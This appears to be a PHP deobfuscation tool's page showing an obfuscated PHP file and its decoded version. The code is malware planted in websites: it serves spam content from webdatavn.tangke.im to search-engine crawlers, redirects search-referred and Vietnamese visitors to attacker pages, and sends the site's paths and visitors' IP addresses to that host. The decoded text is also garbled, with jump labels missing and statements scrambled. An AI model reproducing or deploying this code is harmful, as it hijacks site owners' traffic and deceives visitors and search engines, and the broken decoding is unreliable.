Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user_..

Decoded Output download

<?php 
 goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user_func(function () { return hex2bin("656e64496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("656e64546167"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : return substr(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}, ${call_user_func(function () { return hex2bin("656e64496e646578"); })} - ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : ${call_user_func(function () { return hex2bin("7374617274496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { $X = pack("H16", "7374617274546167"); return $X; })}) + strlen(${call_user_func(function () { return hex2bin("7374617274546167"); })}); goto ; : } goto ; : : goto ; : : goto ; : @set_time_limit(3600); goto ; : : goto ; : header("Content-Type:text/html;charset=utf-8"); goto ; : ${call_user_func(function () { return hex2bin("633134"); })} = "https://webdatavn.tangke.im/"; goto ; : function D63() { goto ; : : goto ; : : goto ; : : goto ; : return ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })}; goto ; : switch (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) { case false: goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["REMOTE_ADDR"]; goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = "unknown"; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["REMOTE_ADDR"]; goto ; : goto ; goto ; : : goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : goto ; goto ; : : goto ; : goto ; goto ; : : goto ; : goto ; goto ; : if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) { goto ; } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto ; : : goto ; : case true: ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["HTTP_CLIENT_IP"]; goto ; } goto ; : } goto ; : switch (in_array(${call_user_func(function () { return hex2bin("72656665726572"); })}, ${call_user_func(function () { return hex2bin("676f6f676c65446f6d61696e73"); })})) { case false: goto ; case true: goto ; : ${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} = getMiddleText(${call_user_func(function () { return hex2bin("64617461"); })}, call_user_func(function () { return hex2bin("636f756e747279436f6465223a22"); }), call_user_func(function () { return hex2bin("22"); })); goto ; : ${call_user_func(function () { return hex2bin("75726c"); })} = call_user_func(function () { return hex2bin("68747470733a2f2f70726f2e69702d6170692e636f6d2f6a736f6e2f"); }) . getVisitorIP() . call_user_func(function () { return hex2bin("3f6b65793d3047627a77566d4173614c5a34486d"); }); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_URL, ${call_user_func(function () { $X = pack("H6", "75726c"); return $X; })}); goto ; : goto ; goto ; : switch (${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} == call_user_func(function () { return hex2bin("564e"); })) { case false: goto ; case true: goto ; : header("Location: " . ${call_user_func(function () { return hex2bin("74617267657455726c"); })}); goto ; : goto ; goto ; : exit; goto ; : ${call_user_func(function () { return hex2bin("74617267657455726c"); })} = "https://webdatavn.tangke.im/vn3.html"; goto ; : } goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : : goto ; : curl_close(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("6375726c"); })} = curl_init(); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("64617461"); })} = curl_exec(${call_user_func(function () { return hex2bin("6375726c"); })}); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}, CURLOPT_HEADER, 1); goto ; : } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })} = strtolower($_SERVER[call_user_func(function () { $X = pack("H30", "485454505f555345525f4147454e54"); return $X; })]); goto ; : : goto ; : switch (strpos(${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })}, call_user_func(function () { $X = pack("H18", "676f6f676c65626f74"); return $X; })) !== false) { case false: goto ; case true: goto ; : exit; goto ; : D31(${call_user_func(function () { return hex2bin("633134"); })}, ${call_user_func(function () { return hex2bin("436464"); })}); goto ; : goto ; goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436464"); })} = ''; goto ; : function getVisitorIP() { goto ; : return ${call_user_func(function () { return hex2bin("6970"); })}; goto ; : : goto ; : goto ; goto ; : : goto ; : if (!empty($_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })])) { goto ; } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("52454d4f54455f41444452"); })]; goto ; : if (!empty($_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })])) { goto ; } goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })]; goto ; : goto ; goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })]; goto ; : } goto ; : function f1A($Eb9) { goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYHOST, 0); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_FOLLOWLOCATION, 1); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H6", "613435"); return $X; })}, CURLOPT_URL, ${call_user_func(function () { return hex2bin("456239"); })}); goto ; : curl_close(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : switch (@ini_get("allow_url_fopen")) { case false: goto ; case true: return file_get_contents(${call_user_func(function () { $X = pack("H6", "456239"); return $X; })}); goto ; } goto ; : return ${call_user_func(function () { return hex2bin("653238"); })}; goto ; : ${call_user_func(function () { return hex2bin("613435"); })} = curl_init(); goto ; : ${call_user_func(function () { return hex2bin("653238"); })} = curl_exec(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : : goto ; : : goto ; : } goto ; : : goto ; : : goto ; : : goto ; : @ob_start(); goto ; : switch (version_compare(PHP_VERSION, "5.1.0", "<")) { case false: @date_default_timezone_set("America/Toronto"); goto ; case true: @ini_set("date.timezone", "America/Toronto"); goto ; } goto ; : ${call_user_func(function () { $X = pack("H26", "676f6f676c65446f6d61696e73"); return $X; })} = [call_user_func(function () { return hex2bin("7777772e676f6f676c652e636f6d"); }), call_user_func(function () { $X = pack("H34", "7777772e676f6f676c652e636f6d2e766e"); return $X; })]; goto ; : ${call_user_func(function () { $X = pack("H14", "72656665726572"); return $X; })} = parse_url($_SERVER[call_user_func(function () { $X = pack("H24", "485454505f52454645524552"); return $X; })], PHP_URL_HOST); goto ; : function D31($c14, $Cdd = '') { goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { return hex2bin("413939"); })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "466334"); return $X; })} = preg_replace("/\/$/si", call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("466334"); })}); goto ; : switch (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) { case false: goto ; case true: goto ; : ${call_user_func(function () { return hex2bin("426466"); })} = F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=1&{${call_user_func(function () { return hex2bin("433139"); })}}"); goto ; : : goto ; : goto ; goto ; : : goto ; : switch (preg_match("/^https?\:\/\//si", ${call_user_func(function () { return hex2bin("426466"); })})) { case false: die(${call_user_func(function () { return hex2bin("426466"); })}); goto ; case true: goto ; : goto ; goto ; : header("Location:" . ${call_user_func(function () { $X = pack("H6", "426466"); return $X; })}); goto ; : exit; goto ; : } goto ; : : goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = ${call_user_func(function () { return hex2bin("433230"); })} == call_user_func(function () { $X = pack("H0", ''); return $X; }) ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != call_user_func(function () { return hex2bin(''); }) ? $_SERVER["PATH_INFO"] : ${call_user_func(function () { return hex2bin("433230"); })} : ${call_user_func(function () { return hex2bin("433230"); })}; goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . ${call_user_func(function () { return hex2bin("443033"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })} = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace(${call_user_func(function () { return hex2bin("466334"); })}, call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = preg_replace("/.*\/(.*)/si", "$1", ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })} == call_user_func(function () { return hex2bin(''); }) || ${call_user_func(function () { return hex2bin("436636"); })} == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433139"); })} = "request_url=" . urlencode("{${call_user_func(function () { return hex2bin("443033"); })}}{${call_user_func(function () { return hex2bin("433230"); })}}") . "&www_path=" . urlencode(${call_user_func(function () { $X = pack("H6", "436636"); return $X; })}) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode(${call_user_func(function () { return hex2bin("413939"); })}) . "&request_type=" . urlencode(${call_user_func(function () { return hex2bin("436464"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}, 0, strrpos(${call_user_func(function () { return hex2bin("413939"); })}, "/")) : (${call_user_func(function () { return hex2bin("466334"); })} != call_user_func(function () { return hex2bin(''); }) ? str_replace(${call_user_func(function () { $X = pack("H6", "466334"); return $X; })}, call_user_func(function () { return hex2bin(''); }), dirname(${call_user_func(function () { return hex2bin("436636"); })})) : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("466334"); })} = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : call_user_func(function () { return hex2bin(''); }); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { return hex2bin("413939"); })}, 1) : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : switch (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) { case false: goto ; case true: die(F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=0&{${call_user_func(function () { return hex2bin("433139"); })}}")); goto ; } goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : } ?>

Did this file decode correctly?

Original Code

<?php
 goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user_func(function () { return hex2bin("\66\x35\x36\x65\66\64\x34\x39\66\x65\x36\x34\66\x35\67\x38"); })} = strpos(${call_user_func(function () { return hex2bin("\67\64\66\65\67\70\x37\64"); })}, ${call_user_func(function () { return hex2bin("\66\x35\66\x65\66\x34\65\x34\x36\x31\x36\x37"); })}, ${call_user_func(function () { return hex2bin("\67\x33\x37\64\66\61\67\62\x37\64\64\71\x36\145\x36\x34\x36\65\67\70"); })}); goto ; : return substr(${call_user_func(function () { return hex2bin("\x37\x34\66\x35\67\x38\x37\64"); })}, ${call_user_func(function () { return hex2bin("\x37\x33\x37\64\66\x31\x37\62\x37\64\64\71\x36\145\66\x34\x36\65\67\70"); })}, ${call_user_func(function () { return hex2bin("\x36\65\66\145\x36\64\x34\71\x36\145\66\64\x36\65\x37\70"); })} - ${call_user_func(function () { return hex2bin("\67\63\67\x34\66\x31\x37\x32\67\x34\64\71\66\145\x36\64\66\65\67\70"); })}); goto ; : ${call_user_func(function () { return hex2bin("\67\63\67\64\x36\61\x37\x32\67\64\64\71\66\145\66\x34\x36\65\x37\70"); })} = strpos(${call_user_func(function () { return hex2bin("\x37\x34\66\x35\67\70\67\64"); })}, ${call_user_func(function () { $X = pack("\110\x31\x36", "\67\63\67\x34\x36\61\67\62\67\x34\65\64\x36\x31\66\67"); return $X; })}) + strlen(${call_user_func(function () { return hex2bin("\x37\63\x37\x34\66\61\x37\x32\67\x34\65\64\66\x31\66\x37"); })}); goto ; : } goto ; : : goto ; : : goto ; : @set_time_limit(3600); goto ; : : goto ; : header("\103\157\156\164\x65\156\x74\55\x54\x79\160\x65\x3a\x74\145\x78\164\57\150\x74\x6d\154\73\143\x68\x61\x72\163\145\x74\x3d\165\x74\146\55\x38"); goto ; : ${call_user_func(function () { return hex2bin("\x36\x33\x33\61\x33\x34"); })} = "\150\164\164\160\163\x3a\x2f\57\167\x65\x62\x64\141\164\141\166\x6e\56\164\x61\x6e\x67\x6b\x65\56\151\155\57"; goto ; : function D63() { goto ; : : goto ; : : goto ; : : goto ; : return ${call_user_func(function () { $X = pack("\x48\x36", "\66\65\66\x34\66\x34"); return $X; })}; goto ; : switch (isset($_SERVER["\110\124\x54\x50\137\x43\x4c\111\x45\x4e\124\137\x49\x50"]) && strcasecmp($_SERVER["\110\x54\x54\120\137\x43\x4c\111\105\116\124\137\x49\120"], "\x75\156\x6b\x6e\x6f\167\156")) { case false: goto ; : if (isset($_SERVER["\x52\x45\115\x4f\x54\x45\137\101\x44\104\122"]) && strcasecmp($_SERVER["\x52\x45\115\117\124\x45\x5f\101\104\x44\x52"], "\165\156\x6b\156\x6f\x77\x6e")) { goto ; } goto ; : ${call_user_func(function () { $X = pack("\x48\66", "\66\65\66\x34\66\64"); return $X; })} = $_SERVER["\x52\x45\x4d\117\x54\105\x5f\x41\x44\104\122"]; goto ; : ${call_user_func(function () { return hex2bin("\66\65\66\64\x36\x34"); })} = "\x75\x6e\153\156\157\167\156"; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\66\x35\x36\x34\x36\x34"); })} = $_SERVER["\122\105\x4d\x4f\124\x45\137\101\x44\104\x52"]; goto ; : goto ; goto ; : : goto ; : if (isset($_SERVER["\122\x45\115\x4f\124\105\137\x41\x44\x44\122"]) && $_SERVER["\122\105\x4d\117\x54\x45\137\x41\104\104\122"] && strcasecmp($_SERVER["\122\x45\x4d\x4f\124\x45\137\101\104\x44\x52"], "\x75\x6e\153\x6e\x6f\x77\x6e")) { goto ; } goto ; : goto ; goto ; : : goto ; : goto ; goto ; : : goto ; : goto ; goto ; : if (isset($_SERVER["\110\x54\124\120\137\x58\x5f\106\117\122\x57\101\122\x44\x45\104\x5f\106\x4f\122"]) && strcasecmp($_SERVER["\110\124\x54\120\x5f\x58\137\x46\117\122\x57\101\x52\x44\x45\x44\137\106\x4f\x52"], "\x75\156\x6b\x6e\157\x77\x6e")) { goto ; } goto ; : : goto ; : ${call_user_func(function () { $X = pack("\110\x36", "\x36\x35\x36\64\66\x34"); return $X; })} = $_SERVER["\x48\124\x54\x50\x5f\130\137\106\x4f\x52\127\x41\122\104\105\104\137\x46\x4f\x52"]; goto ; : : goto ; : case true: ${call_user_func(function () { return hex2bin("\x36\65\x36\64\66\64"); })} = $_SERVER["\x48\x54\124\120\x5f\x43\x4c\111\x45\x4e\124\x5f\x49\x50"]; goto ; } goto ; : } goto ; : switch (in_array(${call_user_func(function () { return hex2bin("\67\62\66\x35\x36\x36\66\65\x37\62\x36\65\x37\x32"); })}, ${call_user_func(function () { return hex2bin("\66\67\x36\146\66\146\x36\x37\x36\143\x36\65\x34\x34\x36\146\66\x64\x36\x31\x36\x39\66\x65\x37\x33"); })})) { case false: goto ; case true: goto ; : ${call_user_func(function () { $X = pack("\x48\x31\62", "\x36\x39\x37\60\x35\64\66\65\67\70\x37\x34"); return $X; })} = getMiddleText(${call_user_func(function () { return hex2bin("\x36\64\66\x31\67\64\x36\x31"); })}, call_user_func(function () { return hex2bin("\66\63\66\x66\67\x35\66\x65\x37\64\67\62\x37\71\x34\x33\66\146\x36\64\x36\x35\x32\x32\x33\141\62\62"); }), call_user_func(function () { return hex2bin("\62\x32"); })); goto ; : ${call_user_func(function () { return hex2bin("\x37\x35\x37\62\66\x63"); })} = call_user_func(function () { return hex2bin("\x36\70\x37\x34\x37\64\x37\60\x37\63\x33\141\x32\x66\62\146\x37\60\x37\x32\66\x66\x32\145\66\71\x37\x30\62\x64\x36\x31\x37\x30\66\x39\x32\145\x36\63\66\x66\66\x64\62\146\66\x61\x37\63\66\146\x36\x65\x32\x66"); }) . getVisitorIP() . call_user_func(function () { return hex2bin("\63\146\x36\x62\66\65\67\x39\x33\144\63\60\x34\67\x36\x32\67\141\x37\x37\x35\x36\x36\x64\x34\x31\x37\63\x36\61\64\143\65\x61\x33\64\64\x38\66\x64"); }); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("\x36\x33\67\x35\x37\x32\66\x63"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("\66\x33\x37\x35\67\x32\x36\143"); })}, CURLOPT_URL, ${call_user_func(function () { $X = pack("\x48\66", "\67\x35\x37\62\66\x63"); return $X; })}); goto ; : goto ; goto ; : switch (${call_user_func(function () { $X = pack("\110\x31\62", "\x36\x39\67\x30\65\x34\66\x35\x37\x38\x37\64"); return $X; })} == call_user_func(function () { return hex2bin("\65\x36\64\145"); })) { case false: goto ; case true: goto ; : header("\114\157\x63\141\x74\151\157\156\72\40" . ${call_user_func(function () { return hex2bin("\67\x34\x36\x31\x37\62\66\67\66\65\67\64\65\x35\67\62\66\x63"); })}); goto ; : goto ; goto ; : exit; goto ; : ${call_user_func(function () { return hex2bin("\67\x34\x36\61\x37\x32\x36\x37\66\65\x37\x34\65\x35\x37\x32\x36\143"); })} = "\150\164\x74\x70\163\x3a\57\57\x77\x65\x62\x64\141\164\141\x76\x6e\x2e\164\141\156\147\153\145\x2e\151\155\x2f\166\x6e\63\x2e\x68\x74\x6d\x6c"; goto ; : } goto ; : curl_setopt(${call_user_func(function () { return hex2bin("\x36\x33\x37\65\67\x32\66\x63"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : : goto ; : curl_close(${call_user_func(function () { $X = pack("\110\x38", "\66\x33\67\65\x37\62\x36\x63"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("\66\63\x37\65\x37\62\x36\x63"); })} = curl_init(); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\66\x34\x36\61\x37\x34\66\61"); })} = curl_exec(${call_user_func(function () { return hex2bin("\66\x33\67\x35\x37\x32\66\x63"); })}); goto ; : curl_setopt(${call_user_func(function () { $X = pack("\x48\x38", "\66\x33\67\x35\x37\62\66\143"); return $X; })}, CURLOPT_HEADER, 1); goto ; : } goto ; : : goto ; : ${call_user_func(function () { $X = pack("\x48\61\x38", "\x37\x35\x37\63\66\x35\67\x32\66\x31\x36\x37\66\x35\66\x65\x37\64"); return $X; })} = strtolower($_SERVER[call_user_func(function () { $X = pack("\x48\63\x30", "\x34\x38\x35\x34\65\64\65\x30\x35\x66\x35\65\65\x33\64\x35\x35\x32\x35\x66\64\x31\x34\67\64\65\x34\145\65\64"); return $X; })]); goto ; : : goto ; : switch (strpos(${call_user_func(function () { $X = pack("\x48\61\70", "\x37\x35\x37\x33\x36\x35\67\x32\66\x31\66\67\66\65\x36\x65\x37\64"); return $X; })}, call_user_func(function () { $X = pack("\110\x31\70", "\x36\x37\x36\x66\66\146\66\x37\x36\x63\x36\65\x36\x32\66\x66\67\64"); return $X; })) !== false) { case false: goto ; case true: goto ; : exit; goto ; : D31(${call_user_func(function () { return hex2bin("\x36\63\63\61\63\64"); })}, ${call_user_func(function () { return hex2bin("\x34\63\66\64\66\64"); })}); goto ; : goto ; goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\x34\x33\x36\64\x36\x34"); })} = ''; goto ; : function getVisitorIP() { goto ; : return ${call_user_func(function () { return hex2bin("\x36\71\67\60"); })}; goto ; : : goto ; : goto ; goto ; : : goto ; : if (!empty($_SERVER[call_user_func(function () { return hex2bin("\x34\70\65\x34\65\64\65\x30\65\x66\65\x38\x35\x66\64\x36\x34\x66\x35\x32\65\x37\x34\61\65\62\64\64\64\65\x34\64\x35\x66\x34\66\x34\x66\65\62"); })])) { goto ; } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\x36\71\67\60"); })} = $_SERVER[call_user_func(function () { return hex2bin("\x35\62\x34\x35\x34\x64\x34\x66\x35\x34\64\65\x35\x66\64\61\x34\64\x34\x34\x35\x32"); })]; goto ; : if (!empty($_SERVER[call_user_func(function () { $X = pack("\x48\62\70", "\x34\70\x35\x34\65\64\x35\60\65\146\64\63\x34\x63\64\71\64\x35\x34\145\65\64\65\x66\x34\x39\x35\60"); return $X; })])) { goto ; } goto ; : ${call_user_func(function () { return hex2bin("\x36\71\67\60"); })} = $_SERVER[call_user_func(function () { return hex2bin("\x34\x38\x35\x34\65\x34\65\x30\x35\x66\65\70\65\x66\x34\66\64\x66\65\62\x35\x37\x34\x31\x35\x32\x34\64\64\65\x34\64\65\146\x34\x36\64\x66\65\62"); })]; goto ; : goto ; goto ; : ${call_user_func(function () { return hex2bin("\x36\71\x37\60"); })} = $_SERVER[call_user_func(function () { $X = pack("\110\62\x38", "\x34\x38\x35\64\x35\x34\65\60\65\x66\x34\63\x34\x63\64\x39\64\65\64\x65\65\x34\65\146\64\x39\65\x30"); return $X; })]; goto ; : } goto ; : function f1A($Eb9) { goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("\66\61\63\64\63\x35"); })}, CURLOPT_SSL_VERIFYHOST, 0); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("\x36\x31\63\x34\63\65"); })}, CURLOPT_FOLLOWLOCATION, 1); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("\66\61\63\64\63\65"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : curl_setopt(${call_user_func(function () { $X = pack("\110\66", "\x36\x31\63\64\x33\x35"); return $X; })}, CURLOPT_URL, ${call_user_func(function () { return hex2bin("\x34\65\66\62\63\x39"); })}); goto ; : curl_close(${call_user_func(function () { return hex2bin("\66\x31\x33\x34\63\65"); })}); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("\x36\61\63\64\x33\x35"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : switch (@ini_get("\141\x6c\x6c\x6f\x77\x5f\x75\x72\x6c\x5f\x66\157\x70\x65\156")) { case false: goto ; case true: return file_get_contents(${call_user_func(function () { $X = pack("\110\66", "\x34\x35\66\x32\63\x39"); return $X; })}); goto ; } goto ; : return ${call_user_func(function () { return hex2bin("\66\x35\x33\x32\63\x38"); })}; goto ; : ${call_user_func(function () { return hex2bin("\66\61\63\x34\63\65"); })} = curl_init(); goto ; : ${call_user_func(function () { return hex2bin("\66\x35\x33\62\x33\70"); })} = curl_exec(${call_user_func(function () { return hex2bin("\x36\x31\x33\64\x33\x35"); })}); goto ; : : goto ; : : goto ; : } goto ; : : goto ; : : goto ; : : goto ; : @ob_start(); goto ; : switch (version_compare(PHP_VERSION, "\x35\x2e\x31\x2e\60", "\74")) { case false: @date_default_timezone_set("\x41\155\x65\162\x69\143\141\57\124\157\162\157\x6e\164\157"); goto ; case true: @ini_set("\144\x61\164\145\56\164\x69\x6d\x65\172\157\x6e\x65", "\101\x6d\x65\x72\x69\143\141\57\124\157\162\x6f\156\164\x6f"); goto ; } goto ; : ${call_user_func(function () { $X = pack("\110\x32\x36", "\x36\67\x36\x66\66\146\x36\67\x36\143\66\65\64\64\x36\146\x36\144\x36\x31\x36\x39\x36\x65\x37\x33"); return $X; })} = [call_user_func(function () { return hex2bin("\x37\67\67\67\67\67\x32\x65\66\67\x36\x66\x36\146\x36\67\x36\x63\66\x35\62\145\66\63\x36\x66\66\x64"); }), call_user_func(function () { $X = pack("\x48\x33\x34", "\67\67\67\x37\x37\67\x32\x65\66\67\x36\146\x36\146\66\67\x36\143\x36\65\62\145\x36\63\66\146\66\144\x32\145\67\66\x36\x65"); return $X; })]; goto ; : ${call_user_func(function () { $X = pack("\x48\61\64", "\67\x32\66\65\66\66\x36\65\67\62\x36\65\67\62"); return $X; })} = parse_url($_SERVER[call_user_func(function () { $X = pack("\110\x32\64", "\64\x38\x35\x34\65\x34\x35\x30\x35\x66\65\62\64\65\64\x36\x34\65\65\62\64\x35\x35\62"); return $X; })], PHP_URL_HOST); goto ; : function D31($c14, $Cdd = '') { goto ; : ${call_user_func(function () { return hex2bin("\x34\61\63\71\63\x39"); })} = strtolower(${call_user_func(function () { return hex2bin("\64\61\63\71\63\x39"); })}) == "\x69\x6e\144\x65\170\x2e\160\150\x70" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("\x34\x31\63\x39\63\x39"); })}; goto ; : ${call_user_func(function () { $X = pack("\110\66", "\x34\x36\x36\x33\63\64"); return $X; })} = preg_replace("\x2f\134\x2f\44\57\x73\151", call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("\x34\66\66\x33\63\x34"); })}); goto ; : switch (isset($_SERVER["\110\x54\124\x50\137\122\x45\x46\x45\x52\x45\x52"]) && preg_match("\x2f\50\x67\157\157\x67\154\x65\x7c\x79\x61\150\x6f\x6f\x7c\x79\x61\x6e\144\x65\x78\x7c\x62\151\x6e\147\x7c\x62\x61\x69\x64\165\x7c\141\157\154\174\141\x73\153\174\x65\170\143\x69\x74\145\174\x64\165\143\153\144\165\x63\x6b\x67\x6f\x29\x2f\x73\x69", $_SERVER["\110\124\124\x50\137\122\105\106\105\122\x45\x52"])) { case false: goto ; case true: goto ; : ${call_user_func(function () { return hex2bin("\x34\x32\x36\x34\x36\x36"); })} = F1A("{${call_user_func(function () { return hex2bin("\66\x33\63\x31\x33\64"); })}}\77\x72\x65\144\x69\162\x65\x63\164\75\x31\46{${call_user_func(function () { return hex2bin("\x34\63\x33\61\x33\x39"); })}}"); goto ; : : goto ; : goto ; goto ; : : goto ; : switch (preg_match("\x2f\136\150\164\x74\x70\163\77\134\x3a\x5c\57\x5c\x2f\57\x73\151", ${call_user_func(function () { return hex2bin("\64\62\x36\64\66\66"); })})) { case false: die(${call_user_func(function () { return hex2bin("\x34\x32\66\x34\66\66"); })}); goto ; case true: goto ; : goto ; goto ; : header("\x4c\x6f\x63\x61\164\151\x6f\156\72" . ${call_user_func(function () { $X = pack("\x48\x36", "\x34\x32\x36\x34\66\66"); return $X; })}); goto ; : exit; goto ; : } goto ; : : goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\64\x33\63\62\63\x30"); })} = ${call_user_func(function () { return hex2bin("\64\63\x33\x32\x33\x30"); })} == call_user_func(function () { $X = pack("\x48\60", ''); return $X; }) ? isset($_SERVER["\x50\101\124\110\137\x49\116\x46\x4f"]) && 